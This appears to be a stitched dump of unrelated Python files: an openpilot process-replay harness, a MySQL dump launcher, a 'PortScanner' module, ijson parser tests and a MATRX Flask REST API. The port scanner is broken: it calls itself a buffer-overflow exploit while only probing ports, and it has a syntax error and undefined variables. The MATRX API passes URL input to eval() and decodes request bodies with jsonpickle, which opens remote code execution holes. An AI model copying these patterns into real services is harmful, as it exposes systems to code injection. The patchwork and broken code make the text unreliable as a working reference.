pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, str):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
# TODO: get a stock VW route
if "Generic Volkswagen" not in msg.carParams.carFingerprint:
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
break
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s : messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
manager.prepare_managed_process(cfg.proc_name)
manager.start_managed_process(cfg.proc_name)
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
manager.kill_managed_process(cfg.proc_name)
return log_msgs
|
sqlInit.py
|
import multiprocessing as mp
from dumpDist import MYSQL_DUMP_DIST
from dumpJson import MYSQL_DUMP_JSON
from dumpNext import MYSQL_DUMP_NEXT
from dumpVertex import MYSQL_DUMP_VERTEX
from dumpposter import MYSQL_DUMP_POSTER
if __name__ == '__main__':
func = [MYSQL_DUMP_DIST, MYSQL_DUMP_JSON, MYSQL_DUMP_NEXT, MYSQL_DUMP_VERTEX, MYSQL_DUMP_POSTER]
n = len(func)
p = [None] * n
for i in range(0, n):
p[i] = mp.Process(target=func[i])
p[i].start()
for i in range(0, n):
p[i].join()
for i in range(0, n):
p[i].close()
|
PortScanner.py
|
import socket
from core import logger
class Auxiliary:
config={
"RHOST":"127.0.0.1"
"Thread":"300"
}
def show_options(self):
print(Fore.YELLOW+"Options"+Style.RESET_ALL)
print(Fore.YELLOW+"-------"+Style.RESET_ALL)
for key in sorted(self.config.keys()):
print(Fore.YELLOW+key, self.config[key], self.get_config(key)+Style.RESET_ALL)
@staticmethod
def show_info():
print(Fore.YELLOW+"\nThis exploit tries to do a buffer \noverflow to the given ip and port"+Style.RESET_ALL)
def set_config(self, key, value):
if key in self.config.keys():
self.config[key] = value
else:
print("No options")
def get_config(self, key):
return self.config[key]
def run(self):
def scanner(RPORT, i):
sock=socket.socket()
result=sock.connect_ex((RHOST, RPORT))
if result==0:
logger.Vulnerable("Port {}".format(RPORT))
else:
logger.NotVulnerable("Port {}".format(RPORT))
sock.close()
i+=1
for i in range(int(self.config["Thread"])):
i=1
thread=threading.Thread(target=scanner, args=(RPORT, hi))
thread.start()
while True:
if i<65353:
pass
elif i>65353:
break
|
tests.py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
import unittest
from io import BytesIO
from decimal import Decimal
import threading
from importlib import import_module
from ijson import common
from ijson.backends.python import basic_parse
from ijson.compat import IS_PY2
JSON = b'''
{
"docs": [
{
"string": "\\u0441\\u0442\\u0440\\u043e\\u043a\\u0430 - \xd1\x82\xd0\xb5\xd1\x81\xd1\x82",
"null": null,
"boolean": false,
"integer": 0,
"double": 0.5,
"exponent": 1.0e+2,
"long": 10000000000
},
{
"meta": [[1], {}]
},
{
"meta": {"key": "value"}
},
{
"meta": null
}
]
}
'''
SCALAR_JSON = b'0'
EMPTY_JSON = b''
INVALID_JSON = b'{"key": "value",}'
INCOMPLETE_JSON = b'"test'
STRINGS_JSON = br'''
{
"str1": "",
"str2": "\"",
"str3": "\\",
"str4": "\\\\"
}
'''
class Parse(object):
'''
Base class for parsing tests that is used to create test cases for each
available backends.
'''
def test_basic_parse(self):
events = list(self.backend.basic_parse(BytesIO(JSON)))
reference = [
('start_map', None),
('map_key', 'docs'),
('start_array', None),
('start_map', None),
('map_key', 'string'),
('string', 'строка - тест'),
('map_key', 'null'),
('null', None),
('map_key', 'boolean'),
('boolean', False),
('map_key', 'integer'),
('number', 0),
('map_key', 'double'),
('number', Decimal('0.5')),
('map_key', 'exponent'),
('number', Decimal('100')),
('map_key', 'long'),
('number', 10000000000),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('start_array', None),
('number', 1),
('end_array', None),
('start_map', None),
('end_map', None),
('end_array', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_map', None),
('map_key', 'key'),
('string', 'value'),
('end_map', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('null', None),
('end_map', None),
('end_array', None),
('end_map', None),
]
for e, r in zip(events, reference):
self.assertEqual(e, r)
def test_basic_parse_threaded(self):
thread = threading.Thread(target=self.test_basic_parse)
thread.start()
thread.join()
def test_scalar(self):
events = list(self.backend.basic_parse(BytesIO(SCALAR_JSON)))
self.assertEqual(events, [('number', 0)])
def test_strings(self):
events = list(self.backend.basic_parse(BytesIO(STRINGS_JSON)))
strings = [value for event, value in events if event == 'string']
self.assertEqual(strings, ['', '"', '\\', '\\\\'])
def test_empty(self):
self.assertRaises(
common.IncompleteJSONError,
lambda: list(self.backend.basic_parse(BytesIO(EMPTY_JSON))),
)
def test_incomplete(self):
self.assertRaises(
common.IncompleteJSONError,
lambda: list(self.backend.basic_parse(BytesIO(INCOMPLETE_JSON))),
)
def test_invalid(self):
self.assertRaises(
common.JSONError,
lambda: list(self.backend.basic_parse(BytesIO(INVALID_JSON))),
)
def test_lazy(self):
# shouldn't fail since iterator is not exhausted
self.backend.basic_parse(BytesIO(INVALID_JSON))
self.assertTrue(True)
# Generating real TestCase classes for each importable backend
for name in ['python', 'yajl', 'yajl2']:
try:
classname = '%sParse' % name.capitalize()
if IS_PY2:
classname = classname.encode('ascii')
locals()[classname] = type(
classname,
(unittest.TestCase, Parse),
{'backend': import_module('ijson.backends.%s' % name)},
)
except ImportError:
pass
class Common(unittest.TestCase):
'''
Backend independent tests. They all use basic_parse imported explicitly from
the python backend to generate parsing events.
'''
def test_object_builder(self):
builder = common.ObjectBuilder()
for event, value in basic_parse(BytesIO(JSON)):
builder.event(event, value)
self.assertEqual(builder.value, {
'docs': [
{
'string': 'строка - тест',
'null': None,
'boolean': False,
'integer': 0,
'double': Decimal('0.5'),
'exponent': Decimal('100'),
'long': 10000000000,
},
{
'meta': [[1], {}],
},
{
'meta': {'key': 'value'},
},
{
'meta': None,
},
],
})
def test_scalar_builder(self):
builder = common.ObjectBuilder()
for event, value in basic_parse(BytesIO(SCALAR_JSON)):
builder.event(event, value)
self.assertEqual(builder.value, 0)
def test_parse(self):
events = common.parse(basic_parse(BytesIO(JSON)))
events = [value
for prefix, event, value in events
if prefix == 'docs.item.meta.item.item'
]
self.assertEqual(events, [1])
def test_items(self):
events = basic_parse(BytesIO(JSON))
meta = list(common.items(common.parse(events), 'docs.item.meta'))
self.assertEqual(meta, [
[[1], {}],
{'key': 'value'},
None,
])
if __name__ == '__main__':
unittest.main()
|
api.py
|
import threading
import copy
import logging
import jsonpickle
from flask import Flask, jsonify, abort, request
from flask_cors import CORS
from matrx.messages.message import Message
from matrx.agents.agent_utils.state import State
_debug = True
__app = Flask(__name__)
CORS(__app)
_port = 3001
# states is a list of length '_current_tick' with a dictionary containing all states of that tick, indexed by agent_id
__states = {}
# variables to be set by MATRX
_matrx_version = None
_current_tick = 0
tick_duration = 0.5
_grid_size = [1, 1]
_nr_states_to_store = 5
_MATRX_info = {}
_next_tick_info = {}
_received_messages = {} # messages received via the api, intended for the Gridworld
_gw_message_manager = None # the message manager of the gridworld, containing all messages of various types
_gw = None
_teams = None # dict with team names (keys) and IDs of agents who are in that team (values)
# currently only one world at a time is supported
__current_world_ID = False
# a temporary state for the current tick, which will be written to states after all
# agents have been updated
_temp_state = {}
# variables to be read (only!) by MATRX and set (only!) through api calls
_userinput = {}
matrx_paused = False
_matrx_done = False
""" The MATRX RESTful API that connects external scripts or visualizers to MATRX core.
Requests should be sent to >MATRX_server_IP<:3001.
For visualization, see the seperate MATRX visualization folder / package.
"""
#########################################################################
# api connection methods
#########################################################################
@__app.route('/get_info/', methods=['GET', 'POST'])
@__app.route('/get_info', methods=['GET', 'POST'])
def get_info():
""" Provides the general information on the world, contained in the world object.
API Path: ``http://>MATRX_core_ip<:3001/get_info``
Returns
MATRX world object, containing general information on the world and scenario.
-------
"""
_MATRX_info['matrx_paused'] = matrx_paused
_MATRX_info['matrx_version'] = _matrx_version
return jsonify(_MATRX_info)
@__app.route('/get_latest_state_and_messages/', methods=['GET', 'POST'])
@__app.route('/get_latest_state_and_messages', methods=['GET', 'POST'])
def get_latest_state_and_messages():
""" Provides all most recent information from MATRX for 1 agent: The state from the latest tick, and any new
messages and chatrooms.
API Path: ``http://>MATRX_core_ip<:3001/get_latest_state_and_messages``
Parameters should be passed via GET URL parameters.
A combination of :func:`~matrx.api.api.get_latest_state` and :func:`~matrx.api.api.get_messages`. See those
two functions for their respective documentation.
Parameters
----------
agent_id : (required GET URL parameter, default {})
The ID of the targeted agent. Only the state of that agent, and chatrooms in which that agent is part will be
sent.
chat_offsets : (optional GET URL parameter, default {})
It is not efficient to send every message every tick. With this offsets dict the requestee can
indicate for every chatroom, which messages they already have, such that only new messages can be sent.
The `offsets` URL parmaeter should be a dict with as keys the chatroom ID, and as values the message offset.
The message offset is the index of the message.
Example of a valid dict: {"0": "10", "3": "5"}.
This returns the message with index 10+ for the chatroom with ID 0 (global chat),
and messages with index 5+ for chatroom with ID 3.
Returns
-------
A dictionary containing the states under the "states" key, and the chatrooms with messages under the
"chatrooms" key.
"""
# from GET requests fetch URL parameters
if request.method == "GET":
error_mssg = f"The /get_latest_state_and_messages/ API call only allows POST requests for MATRX Version 2.0.0 " \
f"and higher. Please see https://matrx-software.com/docs/upgrading-matrx on how to upgrade."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# For POST requests fetch json data
elif request.method == "POST":
data = request.json
agent_id = None if "agent_id" not in data else data['agent_id']
chat_offsets = None if "chat_offsets" not in data else data['chat_offsets']
else:
error_mssg = f"API call only allows POST requests."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# agent_id is required
if not isinstance(agent_id, str):
error_mssg = f"Agent_id passed to /get_latest_state_and_messages API request is not of valid format: " \
f"{agent_id}. Should be string."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(ids=[agent_id])
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# fetch states, chatrooms and messages
states_ = __fetch_state_dicts(_current_tick, agent_id)
chatrooms, messages = __get_messages(agent_id, chat_offsets)
return jsonify({"matrx_paused": matrx_paused, "states": states_, "chatrooms": chatrooms, "messages": messages})
#########################################################################
# MATRX fetch state api calls
#########################################################################
@__app.route('/get_states/<tick>/', methods=['GET', 'POST'])
@__app.route('/get_states/<tick>', methods=['GET', 'POST'])
def get_states(tick):
""" Provides the states of all agents (including the god view) from tick `tick` onwards to current tick.
API Path: ``http://>MATRX_core_ip<:3001/get_states/<tick>``
Parameters
----------
tick
integer indicating from which tick onwards to send the states.
Returns
-------
Returns a list of length `tick` to current_tick. For each tick (item in the list), a dictionary contains the
state for each agent existing in the simulation, indexed by their agent ID.
"""
# fetch URL parameters
agent_id = request.args.get("agent_id")
chat_offsets = request.args.get("chat_offsets")
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
return jsonify(__fetch_state_dicts(tick))
@__app.route('/get_states/<tick>/<agent_ids>/', methods=['GET', 'POST'])
@__app.route('/get_states/<tick>/<agent_ids>', methods=['GET', 'POST'])
def get_states_specific_agents(tick, agent_ids):
""" Provides the states starting from tick `tick` to current_tick, for the agents specified in `agent_ids`.
API Path: ``http://>MATRX_core_ip<:3001/get_states/<tick>/<agent_ids>``
Parameters
----------
tick
integer indicating from which tick onwards to send the states.
agent_ids
One agent ID, or a List of agent IDs for which the states should be returned. God view = "god"
Returns
-------
Returns a list of length `tick` to current_tick. For each tick (item in the list), a dictionary contains the
state for each agent as specified in `agent_ids`, indexed by their agent ID.
"""
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
return jsonify(__fetch_state_dicts(tick, agent_ids))
@__app.route('/get_latest_state/<agent_ids>/', methods=['GET', 'POST'])
@__app.route('/get_latest_state/<agent_ids>', methods=['GET', 'POST'])
def get_latest_state(agent_ids):
""" Provides the latest state of one or multiple agents
API Path: ``http://>MATRX_core_ip<:3001/get_latest_state/<agent_ids>``
Parameters
----------
agent_ids
IDs of agents for which to send the latest state. Either a single agent ID, or a list of agent IDs.
God view = "god"
Returns
-------
Returns a list of length `tick` to current_tick. For each tick, a dictionary contains the states for each
agent as specified in `agent_ids`, indexed by their agent ID.
"""
return get_states_specific_agents(_current_tick, agent_ids)
@__app.route('/get_filtered_latest_state/<agent_ids>/', methods=['POST'])
@__app.route('/get_filtered_latest_state/<agent_ids>', methods=['POST'])
def get_filtered_latest_state(agent_ids):
""" Return a state for a set of agent IDs, filtered to only return the specified properties
"""
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=_current_tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# Get the agent states
agent_states = __fetch_state_dicts(_current_tick, agent_ids)[0]
# Filter the agent states based on the received properties list
props = request.json['properties']
if 'filters' in request.json.keys():
filters = request.json['filters']
else:
filters = None
filtered_states = {}
for agent_id, agent_dict in agent_states.items():
state_dict = agent_dict['state']
filtered_state_dict = __filter_dict(state_dict, props, filters)
filtered_states[agent_id] = filtered_state_dict
return jsonify(filtered_states)
#########################################################################
# MATRX fetch messages api calls
#########################################################################
@__app.route('/get_messages/', methods=['GET', 'POST'])
@__app.route('/get_messages', methods=['GET', 'POST'])
def get_messages_apicall():
""" Returns chatrooms and chat messages for one agent, or all agents.
Per chatroom, an offset can be passed from which will only return messages with a higher index than that
offset.
API Path: ``http://>MATRX_core_ip<:3001/get_messages/``
Parameters should be passed via GET URL parameters.
Parameters
----------
agent_id : (optional URL parameter, default None)
Agent ID string that will make this function only return chatrooms of which that agent is part. Defaults to
None, returning all chatsrooms and all chat messages.
chat_offsets : (optional URL parameter, default None)
It is not efficient to send every message every tick. With this chat_offsets dict the requestee can
indicate for every chatroom, which messages they already have, such that only new messages can be sent.
The `chat_offsets` URL parmaeter should be a dict with as keys the chatroom ID, and as values the message offset.
The message offset is the index of the message.
Example of a valid dict: {"0": "10", "3": "5"}.
This returns the message with index 10+ for the chatroom with ID 0 (global chat),
and messages with index 5+ for chatroom with ID 3.
Returns
-------
Returns a dictionary with chatrooms and per chatroom a list per with messages.
The dict is in the shape of: {chatroom_ID: [Message1, Message2, ..], chatroom_ID2 : ....}
Also see the documentation of the
:func:`~matrx.utils.message_manager.MessageManager.MyClass.fetch_messages` and
:func:`~matrx.utils.message_manager.MessageManager.MyClass.fetch_chatrooms` functions.
"""
# from GET requests fetch URL parameters
if request.method == "GET":
error_mssg = f"The /get_messages/ API call only allows POST requests for MATRX Version 2.0.0 and higher. " \
f"Please see https://matrx-software.com/docs/upgrading-matrx on how to upgrade."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# For POST requests fetch json data
elif request.method == "POST":
data = request.json
agent_id = None if "agent_id" not in data else data['agent_id']
chat_offsets = None if "chat_offsets" not in data else data['chat_offsets']
else:
error_mssg = f"API call only allows POST requests."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
chatrooms, messages = __get_messages(agent_id, chat_offsets)
return jsonify({"chatrooms": chatrooms, "messages": messages})
def __get_messages(agent_id, chat_offsets):
""" Fetch the messages from the Gridworld Message Manager.
See :meth:`~matrx.messages.message_manager.MessageManager.fetch_messages` """
# validate agent_id: None or str
if not isinstance(agent_id, str) and not agent_id is None:
error_mssg = f"Agent_id passed to /get_messages API request is not of valid format: {agent_id}. " \
f"Should be string or not passed."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
if not isinstance(chat_offsets, dict) and not chat_offsets is None:
error_mssg = f"Chatroom message chat_offsets passed to /get_messages API request is not of valid format: " \
f"{chat_offsets}. Should be a dict or not passed."
print("api request not valid:", error_mssg)
print(chat_offsets)
return abort(400, description=error_mssg)
# fetch chatrooms with messages for the passed agent_id and return it
chatrooms = _gw_message_manager.fetch_chatrooms(agent_id=agent_id)
messages = _gw_message_manager.fetch_messages(agent_id=agent_id, chatroom_mssg_offsets=chat_offsets)
return chatrooms, messages
#########################################################################
# MATRX user input api calls
#########################################################################
@__app.route('/send_userinput/<agent_ids>/', methods=['POST'])
@__app.route('/send_userinput/<agent_ids>', methods=['POST'])
def send_userinput(agent_ids):
""" Can be used to send user input from the user (pressed keys) to the specified human agent(s) in MATRX
API Path: ``http://>MATRX_core_ip<:3001/send_userinput/<agent_ids>``
Parameters
----------
agent_ids
ID(s) of the human agent(s) to which the data should be passed.
Returns
-------
returns True if the data was valid (right now always)
-------
"""
global _userinput
api_call_valid, error = __check_states_API_request(_current_tick, agent_ids, ids_required=True)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# make sure the ids are a list
try:
agent_ids = eval(agent_ids)
except:
agent_ids = [agent_ids]
# fetch the data from the request object
data = request.json
# add each pressed key as user input for each specified human agent
for agent_id in agent_ids:
for pressed_key in data:
# add the agent_id if not existing yet
if agent_id not in _userinput:
_userinput[agent_id] = []
# save the pressed key of the agent
_userinput[agent_id].append(pressed_key)
return jsonify(True)
@__app.route('/send_message/', methods=['POST'])
@__app.route('/send_message', methods=['POST'])
def send_message():
""" Send a message containing information to one or multiple specific agent, the agent's team, or all agents.
Message as defined in matrx.utils.message
API Path: ``http://>MATRX_core_ip<:3001/send_message``
Returns
-------
Error if api call invalid, or True if valid.
"""
# fetch the data
data = request.json
print("Received message to send with data:", data)
# check that all required parameters have been passed
required_params = ("content", "sender", "receiver")
if not all(k in data for k in required_params):
error = {"error_code": 400, "error_message": f"Missing one of the required parameters: {required_params}"}
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# create message
msg = Message(content=data['content'], from_id=data['sender'], to_id=data['receiver'])
# add the _received_messages to the api global variable
if data['sender'] not in _received_messages:
_received_messages[data['sender']] = []
_received_messages[data['sender']].append(msg)
return jsonify(True)
#########################################################################
# MATRX context menu API calls
#########################################################################
@__app.route('/fetch_context_menu_of_self/', methods=['POST'])
@__app.route('/fetch_context_menu_of_self', methods=['POST'])
def fetch_context_menu_of_self():
""" Fetch the context menu opened for a specific object/location of the agent being controlled by the user.
API Path: ``http://>MATRX_core_ip<:3001/fetch_context_menu_of_self``
"""
# fetch the data
data = request.json
# check that all required parameters have been passed
required_params = ("agent_id_who_clicked", "clicked_object_id", "click_location", "self_selected")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
agent_id_who_clicked = data['agent_id_who_clicked']
clicked_object_id = data['clicked_object_id']
click_location = data['click_location']
self_selected = data['self_selected']
# check if agent_id_who_clicked exists in the gw
if agent_id_who_clicked not in _gw.registered_agents.keys() and agent_id_who_clicked != "god":
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} does not exist.")
# check if it is a human agent
if agent_id_who_clicked in _gw.registered_agents.keys() and \
not _gw.registered_agents[agent_id_who_clicked].is_human_agent:
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} is not a human agent and thus does"
f" not have a context_menu_of_self() function.")
# ignore if called from the god view
if agent_id_who_clicked.lower() == "god":
return __return_error(code=400,
message=f"The god view is not an agent and thus cannot show its own context menu.")
# fetch context menu from agent
context_menu = _gw.registered_agents[agent_id_who_clicked].create_context_menu_for_self_func(clicked_object_id,
click_location,
self_selected)
# encode the object instance of the message
for item in context_menu:
item['Message'] = jsonpickle.encode(item['Message'])
return jsonify(context_menu)
@__app.route('/fetch_context_menu_of_other/', methods=['POST'])
@__app.route('/fetch_context_menu_of_other', methods=['POST'])
def fetch_context_menu_of_other():
""" Fetch the context menu opened for a specific object/location of the agent being controlled by the user.
API Path: ``http://>MATRX_core_ip<:3001/fetch_context_menu_of_other``
"""
# fetch the data
data = request.json
# check that all required parameters have been passed
required_params = ("agent_id_who_clicked", "clicked_object_id", "click_location", "agent_selected")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
agent_id_who_clicked = data['agent_id_who_clicked']
clicked_object_id = data['clicked_object_id']
click_location = data['click_location']
agent_selected = data['agent_selected']
# check if agent_id_who_clicked exists in the _gw
if agent_id_who_clicked not in _gw.registered_agents.keys() and agent_id_who_clicked != "god":
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} does not exist.")
# check if the selected agent exists
if agent_selected not in _gw.registered_agents.keys():
return __return_error(code=400, message=f"Selected agent with ID {agent_selected} does not exist.")
# ignore if called from the god view
# if agent_id_who_clicked.lower() == "god":
# return __return_error(code=400, message=f"The god view is not an agent and thus cannot show its own context menu.")
# fetch context menu from agent
context_menu = _gw.registered_agents[agent_selected].create_context_menu_for_other_func(agent_id_who_clicked,
clicked_object_id,
click_location)
# encode the object instance of the message
for item in context_menu:
item['Message'] = jsonpickle.encode(item['Message'])
return jsonify(context_menu)
@__app.route('/send_message_pickled/', methods=['POST'])
@__app.route('/send_message_pickled', methods=['POST'])
def send_message_pickled():
""" This function makes it possible to send a custom message to a MATRX agent via the API as a jsonpickle object.
For instance, sending a custom message when a context menu option is clicked.
The pre-formatted CustomMessage instance can be jsonpickled and sent via the API.
This API call can handle that request and send the CustomMessage to the MATRX agent
API Path: ``http://>MATRX_core_ip<:3001/send_message_pickled``
Returns
-------
Error if api call invalid, or True if valid.
"""
# fetch the data
data = request.json
print(data)
# check that all required parameters have been passed
required_params = ("sender", "message")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
sender_id = data['sender']
mssg = jsonpickle.decode(data['message'])
# add the _received_messages to the api global variable
if sender_id not in _received_messages:
_received_messages[sender_id] = []
_received_messages[sender_id].append(mssg)
return jsonify(True)
#########################################################################
# MATRX control api calls
#########################################################################
@__app.route('/pause/', methods=['GET', 'POST'])
@__app.route('/pause', methods=['GET', 'POST'])
def pause_MATRX():
""" Pause the MATRX simulation
API Path: ``http://>MATRX_core_ip<:3001/pause``
Returns
True if paused, False if already paused
-------
"""
global matrx_paused
if not matrx_paused:
matrx_paused = True
return jsonify(True)
else:
return jsonify(False)
@__app.route('/start/', methods=['GET', 'POST'])
@__app.route('/start', methods=['GET', 'POST'])
def start_MATRX():
""" Starts / unpauses the MATRX simulation
API Path: ``http://>MATRX_core_ip<:3001/start``
Returns
True if it has been started, False if it is already running
-------
"""
global matrx_paused
if matrx_paused:
matrx_paused = False
return jsonify(True)
else:
return jsonify(False)
@__app.route('/stop/', methods=['GET', 'POST'])
@__app.route('/stop', methods=['GET', 'POST'])
def stop_MATRX():
""" Stops MATRX scenario
API Path: ``http://>MATRX_core_ip<:3001/stop``
Returns
True
-------
"""
global _matrx_done
_matrx_done = True
return jsonify(True)
@__app.route('/change_tick_duration/<tick_dur>/', methods=['GET', 'POST'])
@__app.route('/change_tick_duration/<tick_dur>', methods=['GET', 'POST'])
def change_MATRX_speed(tick_dur):
""" Change the tick duration / simulation speed of MATRX
API Path: ``http://>MATRX_core_ip<:3001/change_tick_duration/<tick_dur>``
Parameters
----------
tick_dur
The duration of 1 tick in seconds
Returns
-------
True if successfully changed tick speed (400 error if tick_duration not valid)
"""
# check if the passed value is a float / int, and return an error if not
try:
float(tick_dur)
except:
return abort(400, description=f'Tick duration has to be an float, but is of type {type(tick_dur)}')
# save the new tick duration
global tick_duration
tick_duration = float(tick_dur)
return jsonify(True)
@__app.route('/shutdown_API/', methods=['GET', 'POST'])
@__app.route('/shutdown_API', methods=['GET', 'POST'])
def shutdown():
""" Shuts down the api by stopping the Flask thread
API Path: ``http://>MATRX_core_ip<:3001/shutdown_API``
Returns
True
-------
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Unable to shutdown api server. Not running with the Werkzeug Server')
func()
print("api server shutting down...")
return jsonify(True)
#########################################################################
# Errors
#########################################################################
@__app.errorhandler(400)
def __bad_request(e):
print("Throwing error", e)
return jsonify(error=str(e)), 400
def __return_error(code, message):
""" A helper function that returns a specified error code and message """
if _debug:
print(f"api request not valid: code {code}. Message: {message}.")
return abort(code, description=message)
#########################################################################
# api helper methods
#########################################################################
def __clean_input_ids(ids):
""" Clean a received api variable ids to valid Python code
Parameters
----------
ids
Can be a string (1 agent id), string encoded list (containing agent ids), list with agent ids, or None
Returns
-------
None or list with string agent IDs
"""
if ids is None:
return None
try:
ids = eval(ids)
except:
pass
# if it is a list
if isinstance(ids, list):
return ids
if isinstance(ids, str):
return [ids]
def __check_messages_API_request(tick=None, agent_id=None):
""" Checks if the variables of the api request are valid, and if the requested information exists
Parameters
----------
tick
agent_id
Returns
-------
"""
if _gw_message_manager is None:
return False, {'error_code': 400,
'error_message': f'MATRX hasn\'t started yet.'}
tick = _current_tick if tick is None else tick
# check user input, such as tick
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
return True, None
def __check_states_API_request(tick=None, ids=None, ids_required=False):
""" Checks if the variables of the api request are valid, and if the requested information exists
Parameters
----------
tick
MATRX tick
ids
string with 1 agent ID, or list of agent IDS
ids_required
Whether IDS are required
Returns
-------
Success (Boolean indicating whether it is valid or not), Error (if any, prodiving the type and a message)
See for the error codes:
https://www.ibm.com/support/knowledgecenter/SS42VS_7.3.0/com.ibm.qradar.doc/c_rest_api_errors.html
"""
if _gw_message_manager is None:
return False, {'error_code': 400,
'error_message': f'MATRX hasn\'t started yet.'}
# check user input, such as tick and agent id
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
# Don't throw an error if MATRX is paused the first tick, and thus still has no states
# if _current_tick is 0 and matrx_paused:
# return True, None
# if this api call requires ids, check this variable on validity as well
if ids_required:
# check if ids variable is of a valid type
try:
ids = eval(ids)
except:
pass
# return False, {'error_code': 400, 'error_message': f'Provided IDs are not of valid format. Provides IDs
# is of ' f'type {type(ids)} but should be either of type string for ' f'requesting states of 1 agent (
# e.g. "god"), or a list of ' f'IDs(string) for requesting states of multiple agents'}
# check if the api was reset during this time
if len(__states) == 0:
return False, {'error_code': 400,
'error_message': f'api is reconnecting to a new world'}
# check if the provided ids exist for all requested ticks
ids = [ids] if isinstance(ids, str) else ids
for t in range(tick, _current_tick + 1):
for id in ids:
if id not in __states[t]:
return False, {'error_code': 400,
'error_message': f'Trying to fetch the state for agent with ID "{id}" for tick {t}, '
f'but no data on that agent exists for that tick. Is the agent ID '
f'correct?'}
# all checks cleared, so return with success and no error message
return True, None
